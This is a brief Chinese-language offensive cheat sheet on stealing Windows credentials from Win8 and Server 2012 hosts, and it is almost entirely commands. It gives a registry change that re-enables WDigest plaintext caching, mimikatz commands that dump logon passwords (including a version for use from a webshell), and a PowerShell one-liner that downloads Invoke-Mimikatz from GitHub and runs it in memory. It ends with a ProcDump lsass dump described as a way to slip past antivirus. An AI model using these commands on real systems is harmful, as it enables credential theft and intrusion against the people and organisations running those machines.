win8+win2012明文抓取

修改一个注册表就可以抓取了

  1. reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

测试失败 工具:https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1 文章地址:https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/

域用户hash抓取 #####mimikatz 只能抓取登陆过的用户hash,无法抓取所有用户,需要免杀 1、本机测试直接获取内存中的明文密码

  1. privilege::debug
  2. sekurlsa::logonpasswords

win8+win2012明文抓取 - 图1

2、非交互式抓明文密码(webshell中)

  1. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

3、powershell加载mimikatz抓取密码

  1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

4、ProcDump + Mimikatz本地分析 文件会比较大,低效,但是安全(绕过杀软) ps:mimikatz的平台(platform)要与进行dump的系统(source dump)兼容(比如dowm了08的,本地就要用08系统来分析)

  1. 远程:
  2. Procdump.exe -accepteula -ma lsass.exe lsass.dmp
  3. 本地:
  4. sekurlsa::minidump lsass.dump.dmp
  5. sekurlsa::logonpasswords full

win8+win2012明文抓取 - 图2